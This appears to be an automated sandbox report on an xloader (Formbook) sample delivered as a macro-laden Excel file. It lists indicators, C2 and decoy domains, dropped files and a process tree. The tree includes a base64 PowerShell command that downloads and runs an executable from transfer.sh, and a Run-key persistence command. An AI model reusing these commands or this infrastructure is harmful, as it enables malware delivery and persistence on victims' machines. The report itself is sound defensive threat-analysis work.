xloader | bdad87cc1c4683be3d1a173ac533eb8322ab725e055535c3288b33ac64373ea6

Analysis

max time kernel
150s
max time network
65s
platform
windows7_x64
resource
win7v20201028
submitted
09-03-2021 00:34

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Machine Specifications.xlsm
Size

148KB
MD5

9ce6349baf1276836ea9764233aa09ae
SHA1

0d5349b1e57866a0111d6ec731d21e9cf151a6dd
SHA256

bdad87cc1c4683be3d1a173ac533eb8322ab725e055535c3288b33ac64373ea6
SHA512

b88b6946764199c0c33a02fb02a35d96dea5c30ad01d70b0afdbacd5bae7198ef9ee5722b35cba562daae7ac6c813358082f6fd4c85ee2c2e66b7d6452c29618

Score

10^/10

xloader loader persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

http://transfer.sh/get/D8sXG/text.exe

Extracted

Family

xloader

http://www.dubainights.net/rrrq/

Decoy

sdlcutps.com

novieffendi.com

highpointedu.com

sagaming.today

charlottesteer.com

kilopapa.net

prime-executive.com

8893270.com

gorillaikka.com

coynesgastropub.com

sun9376.xyz

coolkilo.com

1clickdoc.online

fosa.info

smileburgerdelivery.com

ronpaulmessge17.com

sqwigs.com

xn--c1ajbkdnb9b0g.xn--p1acf

gelzers.info

banpluspay.com

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

cmd.exe

description	pid	pid_target	process	target process
Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process	1776	1932	cmd.exe	EXCEL.EXE

Xloader
Xloader is a rebranded version of Formbook malware.
loader xloader

Xloader Payload 3 IoCs

rat

Processes:

resource	yara_rule
behavioral1/memory/316-60-0x0000000000400000-0x0000000000428000-memory.dmp	xloader
behavioral1/memory/316-61-0x000000000041CFC0-mapping.dmp	xloader
behavioral1/memory/604-69-0x0000000000110000-0x0000000000138000-memory.dmp	xloader

Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

6 1736 powershell.exe
Executes dropped EXE 3 IoCs

Processes:

fDHPa.exeDriver auto update.exeAddInProcess32.exe

pid process

372 fDHPa.exe
1652 Driver auto update.exe
316 AddInProcess32.exe
Loads dropped DLL 3 IoCs

Processes:

powershell.exefDHPa.exeDriver auto update.exe

pid process

1736 powershell.exe
372 fDHPa.exe
1652 Driver auto update.exe

flow	pid	process
6	1736	powershell.exe

pid	process
372	fDHPa.exe
1652	Driver auto update.exe
316	AddInProcess32.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\Driver auto update.exe"	reg.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

Driver auto update.exeAddInProcess32.exechkdsk.exe

description	pid	process	target process
PID 1652 set thread context of 316	1652	Driver auto update.exe	AddInProcess32.exe
PID 316 set thread context of 1260	316	AddInProcess32.exe	Explorer.EXE
PID 604 set thread context of 1260	604	chkdsk.exe	Explorer.EXE

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXEchkdsk.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier	chkdsk.exe

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-3825035466-2522850611-591511364-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1932 EXCEL.EXE

pid	process
1932	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exefDHPa.exeDriver auto update.exeAddInProcess32.exechkdsk.exe

pid	process
1736	powershell.exe
1736	powershell.exe
372	fDHPa.exe
372	fDHPa.exe
372	fDHPa.exe
1652	Driver auto update.exe
1652	Driver auto update.exe
316	AddInProcess32.exe
316	AddInProcess32.exe
604	chkdsk.exe
604	chkdsk.exe
604	chkdsk.exe
604	chkdsk.exe
604	chkdsk.exe
604	chkdsk.exe
604	chkdsk.exe
604	chkdsk.exe
604	chkdsk.exe

Suspicious behavior: MapViewOfSection 5 IoCs

Processes:

AddInProcess32.exechkdsk.exe

pid process

316 AddInProcess32.exe
316 AddInProcess32.exe
316 AddInProcess32.exe
604 chkdsk.exe
604 chkdsk.exe

pid	process
316	AddInProcess32.exe
316	AddInProcess32.exe
316	AddInProcess32.exe
604	chkdsk.exe
604	chkdsk.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powershell.exefDHPa.exeDriver auto update.exeAddInProcess32.exechkdsk.exe

description	pid	process
Token: SeDebugPrivilege	1736	powershell.exe
Token: SeDebugPrivilege	372	fDHPa.exe
Token: SeDebugPrivilege	1652	Driver auto update.exe
Token: SeDebugPrivilege	316	AddInProcess32.exe
Token: SeDebugPrivilege	604	chkdsk.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid process

1932 EXCEL.EXE
1932 EXCEL.EXE
1932 EXCEL.EXE
1932 EXCEL.EXE
1932 EXCEL.EXE

pid	process
1932	EXCEL.EXE
1932	EXCEL.EXE
1932	EXCEL.EXE
1932	EXCEL.EXE
1932	EXCEL.EXE

Suspicious use of WriteProcessMemory 42 IoCs

Processes:

EXCEL.EXEcmd.exepowershell.exefDHPa.execmd.exeDriver auto update.exeExplorer.EXEchkdsk.exe

description	pid	process	target process
PID 1932 wrote to memory of 1776	1932	EXCEL.EXE	cmd.exe
PID 1932 wrote to memory of 1776	1932	EXCEL.EXE	cmd.exe
PID 1932 wrote to memory of 1776	1932	EXCEL.EXE	cmd.exe
PID 1932 wrote to memory of 1776	1932	EXCEL.EXE	cmd.exe
PID 1776 wrote to memory of 1736	1776	cmd.exe	powershell.exe
PID 1776 wrote to memory of 1736	1776	cmd.exe	powershell.exe
PID 1776 wrote to memory of 1736	1776	cmd.exe	powershell.exe
PID 1776 wrote to memory of 1736	1776	cmd.exe	powershell.exe
PID 1736 wrote to memory of 372	1736	powershell.exe	fDHPa.exe
PID 1736 wrote to memory of 372	1736	powershell.exe	fDHPa.exe
PID 1736 wrote to memory of 372	1736	powershell.exe	fDHPa.exe
PID 1736 wrote to memory of 372	1736	powershell.exe	fDHPa.exe
PID 372 wrote to memory of 1676	372	fDHPa.exe	cmd.exe
PID 372 wrote to memory of 1676	372	fDHPa.exe	cmd.exe
PID 372 wrote to memory of 1676	372	fDHPa.exe	cmd.exe
PID 372 wrote to memory of 1676	372	fDHPa.exe	cmd.exe
PID 1676 wrote to memory of 752	1676	cmd.exe	reg.exe
PID 1676 wrote to memory of 752	1676	cmd.exe	reg.exe
PID 1676 wrote to memory of 752	1676	cmd.exe	reg.exe
PID 1676 wrote to memory of 752	1676	cmd.exe	reg.exe
PID 372 wrote to memory of 1652	372	fDHPa.exe	Driver auto update.exe
PID 372 wrote to memory of 1652	372	fDHPa.exe	Driver auto update.exe
PID 372 wrote to memory of 1652	372	fDHPa.exe	Driver auto update.exe
PID 372 wrote to memory of 1652	372	fDHPa.exe	Driver auto update.exe
PID 372 wrote to memory of 1652	372	fDHPa.exe	Driver auto update.exe
PID 372 wrote to memory of 1652	372	fDHPa.exe	Driver auto update.exe
PID 372 wrote to memory of 1652	372	fDHPa.exe	Driver auto update.exe
PID 1652 wrote to memory of 316	1652	Driver auto update.exe	AddInProcess32.exe
PID 1652 wrote to memory of 316	1652	Driver auto update.exe	AddInProcess32.exe
PID 1652 wrote to memory of 316	1652	Driver auto update.exe	AddInProcess32.exe
PID 1652 wrote to memory of 316	1652	Driver auto update.exe	AddInProcess32.exe
PID 1652 wrote to memory of 316	1652	Driver auto update.exe	AddInProcess32.exe
PID 1652 wrote to memory of 316	1652	Driver auto update.exe	AddInProcess32.exe
PID 1652 wrote to memory of 316	1652	Driver auto update.exe	AddInProcess32.exe
PID 1260 wrote to memory of 604	1260	Explorer.EXE	chkdsk.exe
PID 1260 wrote to memory of 604	1260	Explorer.EXE	chkdsk.exe
PID 1260 wrote to memory of 604	1260	Explorer.EXE	chkdsk.exe
PID 1260 wrote to memory of 604	1260	Explorer.EXE	chkdsk.exe
PID 604 wrote to memory of 1172	604	chkdsk.exe	cmd.exe
PID 604 wrote to memory of 1172	604	chkdsk.exe	cmd.exe
PID 604 wrote to memory of 1172	604	chkdsk.exe	cmd.exe
PID 604 wrote to memory of 1172	604	chkdsk.exe	cmd.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious use of WriteProcessMemory
PID:1260

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Machine Specifications.xlsm"
2⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1932

C:\Windows\SysWOW64\cmd.exe
cmd /c powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBEADgAcwBYAEcALwB0AGUAeAB0AC4AZQB4AGUAJwAsACgAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAKQArACcAXABmAEQASABQAGEALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAyADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAXABmAEQASABQAGEALgBlAHgAZQA=
3⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -encodedCommand KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEYAaQBsAGUAKAAnAGgAdAB0AHAAOgAvAC8AdAByAGEAbgBzAGYAZQByAC4AcwBoAC8AZwBlAHQALwBEADgAcwBYAEcALwB0AGUAeAB0AC4AZQB4AGUAJwAsACgAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAKQArACcAXABmAEQASABQAGEALgBlAHgAZQAnACkAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAyADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAJABlAG4AdgA6AGEAcABwAGQAYQB0AGEAXABmAEQASABQAGEALgBlAHgAZQA=
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1736

C:\Users\Admin\AppData\Roaming\fDHPa.exe
"C:\Users\Admin\AppData\Roaming\fDHPa.exe"
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:372

C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svchost" /t REG_SZ /d "C:\Users\Admin\Driver auto update.exe"
6⤵
- Suspicious use of WriteProcessMemory
PID:1676

C:\Windows\SysWOW64\reg.exe
REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "svchost" /t REG_SZ /d "C:\Users\Admin\Driver auto update.exe"
7⤵
- Adds Run key to start application
PID:752

C:\Users\Admin\Driver auto update.exe
"C:\Users\Admin\Driver auto update.exe"
6⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1652

C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
"C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
PID:316

C:\Windows\SysWOW64\chkdsk.exe
"C:\Windows\SysWOW64\chkdsk.exe"
2⤵
- Suspicious use of SetThreadContext
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:604

C:\Windows\SysWOW64\cmd.exe
/c del "C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe"
3⤵
PID:1172

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

T1060

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Query Registry

T1012

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
MD5
6a673bfc3b67ae9782cb31af2f234c68

SHA1
7544e89566d91e84e3cd437b9a073e5f6b56566e

SHA256
978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

SHA512
72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

Download Submit
C:\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
MD5
6a673bfc3b67ae9782cb31af2f234c68

SHA1
7544e89566d91e84e3cd437b9a073e5f6b56566e

SHA256
978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

SHA512
72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

Download Submit
C:\Users\Admin\AppData\Roaming\fDHPa.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
C:\Users\Admin\AppData\Roaming\fDHPa.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
C:\Users\Admin\Driver auto update.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
C:\Users\Admin\Driver auto update.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
\Users\Admin\AppData\Local\Temp\AddInProcess32.exe
MD5
6a673bfc3b67ae9782cb31af2f234c68

SHA1
7544e89566d91e84e3cd437b9a073e5f6b56566e

SHA256
978a4093058aa2ebf05dc353897d90d950324389879b57741b64160825b5ec0e

SHA512
72c302372ce87ceda2a3c70a6005d3f9c112f1641bc7fe6824c718971233e66c07e2996d2785fa358566c38714c25ea812c05c7cfd2f588284849d495fd24f39

Download Submit
\Users\Admin\AppData\Roaming\fDHPa.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
\Users\Admin\Driver auto update.exe
MD5
884e8962c1368f3787f7f2ae964e5bf9

SHA1
c8ba80eb0907a049f2f4bfb7775266ab83da971e

SHA256
ec744aeae689c95f44a24eb398e65c3a722595de5504db84b2e41488f30a7510

SHA512
9b99e635997f3f2124ff88d771e16d7a7bd1477e0d64e9c10e0813114d19ae0eb2e91e1bcfedd36eaad2f5d80e4bfbe69ce0a941e3ded8f4659a0b66774ec40d

Download Submit
memory/316-64-0x0000000000A20000-0x0000000000D23000-memory.dmp

Filesize
3.0MB

Download
memory/316-61-0x000000000041CFC0-mapping.dmp

Download
memory/316-60-0x0000000000400000-0x0000000000428000-memory.dmp

Filesize
160KB

Download
memory/316-65-0x00000000000B0000-0x00000000000C0000-memory.dmp

Filesize
64KB

Download
memory/372-42-0x0000000006010000-0x000000000603F000-memory.dmp

Filesize
188KB

Download
memory/372-45-0x0000000004D41000-0x0000000004D42000-memory.dmp

Filesize
4KB

Download
memory/372-40-0x0000000004D40000-0x0000000004D41000-memory.dmp

Filesize
4KB

Download
memory/372-38-0x00000000003A0000-0x00000000003A1000-memory.dmp

Filesize
4KB

Download
memory/372-37-0x000000006B930000-0x000000006C01E000-memory.dmp

Filesize
6.9MB

Download
memory/372-34-0x0000000000000000-mapping.dmp

Download
memory/604-71-0x0000000001FB0000-0x00000000022B3000-memory.dmp

Filesize
3.0MB

Download
memory/604-69-0x0000000000110000-0x0000000000138000-memory.dmp

Filesize
160KB

Download
memory/604-67-0x0000000000000000-mapping.dmp

Download
memory/604-68-0x00000000006F0000-0x00000000006F7000-memory.dmp

Filesize
28KB

Download
memory/604-72-0x0000000001E20000-0x0000000001EAF000-memory.dmp

Filesize
572KB

Download
memory/752-44-0x0000000000000000-mapping.dmp

Download
memory/1172-70-0x0000000000000000-mapping.dmp

Download
memory/1260-66-0x0000000004980000-0x0000000004A45000-memory.dmp

Filesize
788KB

Download
memory/1652-57-0x0000000000CE0000-0x0000000000CE1000-memory.dmp

Filesize
4KB

Download
memory/1652-50-0x000000006B930000-0x000000006C01E000-memory.dmp

Filesize
6.9MB

Download
memory/1652-56-0x0000000000CD0000-0x0000000000CDB000-memory.dmp

Filesize
44KB

Download
memory/1652-47-0x0000000000000000-mapping.dmp

Download
memory/1652-53-0x0000000004BA0000-0x0000000004BA1000-memory.dmp

Filesize
4KB

Download
memory/1652-51-0x0000000000CF0000-0x0000000000CF1000-memory.dmp

Filesize
4KB

Download
memory/1676-43-0x0000000000000000-mapping.dmp

Download
memory/1736-11-0x0000000004740000-0x0000000004741000-memory.dmp

Filesize
4KB

Download
memory/1736-14-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/1736-22-0x0000000006040000-0x0000000006041000-memory.dmp

Filesize
4KB

Download
memory/1736-12-0x0000000004742000-0x0000000004743000-memory.dmp

Filesize
4KB

Download
memory/1736-23-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1736-9-0x0000000002300000-0x0000000002301000-memory.dmp

Filesize
4KB

Download
memory/1736-8-0x000000006B930000-0x000000006C01E000-memory.dmp

Filesize
6.9MB

Download
memory/1736-7-0x00000000750C1000-0x00000000750C3000-memory.dmp

Filesize
8KB

Download
memory/1736-6-0x0000000000000000-mapping.dmp

Download
memory/1736-24-0x00000000060F0000-0x00000000060F1000-memory.dmp

Filesize
4KB

Download
memory/1736-31-0x0000000006290000-0x0000000006291000-memory.dmp

Filesize
4KB

Download
memory/1736-13-0x00000000025C0000-0x00000000025C1000-memory.dmp

Filesize
4KB

Download
memory/1736-32-0x00000000062C0000-0x00000000062C1000-memory.dmp

Filesize
4KB

Download
memory/1736-10-0x0000000004780000-0x0000000004781000-memory.dmp

Filesize
4KB

Download
memory/1736-17-0x0000000005FD0000-0x0000000005FD1000-memory.dmp

Filesize
4KB

Download
memory/1776-5-0x0000000000000000-mapping.dmp

Download
memory/1932-3-0x0000000070BA1000-0x0000000070BA3000-memory.dmp

Filesize
8KB

Download
memory/1932-4-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/1932-2-0x000000002FB11000-0x000000002FB14000-memory.dmp

Filesize
12KB

Download